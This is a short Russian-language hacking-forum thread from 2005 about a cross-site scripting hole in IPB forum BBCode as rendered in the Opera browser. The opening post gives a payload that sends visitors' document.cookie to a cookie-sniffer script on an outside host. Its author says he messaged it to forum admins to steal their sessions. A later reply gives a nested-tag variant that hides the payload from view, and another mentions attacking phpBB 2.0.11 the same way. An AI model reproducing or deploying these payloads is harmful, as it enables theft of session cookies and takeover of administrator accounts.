Форумы XSS в форуме IPB, на примере браузера Опера

Discussion in 'Уязвимости CMS/форумов' started by Fr13nd, 13 Jan 2005.

  1. Fr13nd

    Fr13nd New Member

    Joined:
    3 Nov 2004
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    Code:
    [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/COLOR] 
    послал админам в личку, потом был забанен....
    потом доперло , что у админов опера,
    так он и есть

    отображение хсс в опере

    Code:
    '>` style=background:url(javascript:document.images[1].src="sniff?"+document.cookie)
    как сделать чтоб хотябы код не было видно ?
     
  2. >>ElvI$<<

    >>ElvI$<< Elder - Старейшина

    Joined:
    12 Jan 2005
    Messages:
    42
    Likes Received:
    4
    Reputations:
    -3
    Внимательней читай коменты...
     
  3. >>ElvI$<<

    >>ElvI$<< Elder - Старейшина

    Joined:
    12 Jan 2005
    Messages:
    42
    Likes Received:
    4
    Reputations:
    -3
    ой 8) не корректно отобразилось...


    [COLOR=цвет фона][COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.ima
    ges[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/COLOR][/COLOR]

    Вот и все...я уже давно допер,как их скрыть!
     
  4. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Кстати, если хорошо подумать, то эту уязвимость можно адаптировать и под оперу...Без использования обратной кавычки
     
  5. >>ElvI$<<

    >>ElvI$<< Elder - Старейшина

    Joined:
    12 Jan 2005
    Messages:
    42
    Likes Received:
    4
    Reputations:
    -3
    да 8) А еще если хорошо подумать мона и Phpbb 2.0.11 через Xss ломануть 8)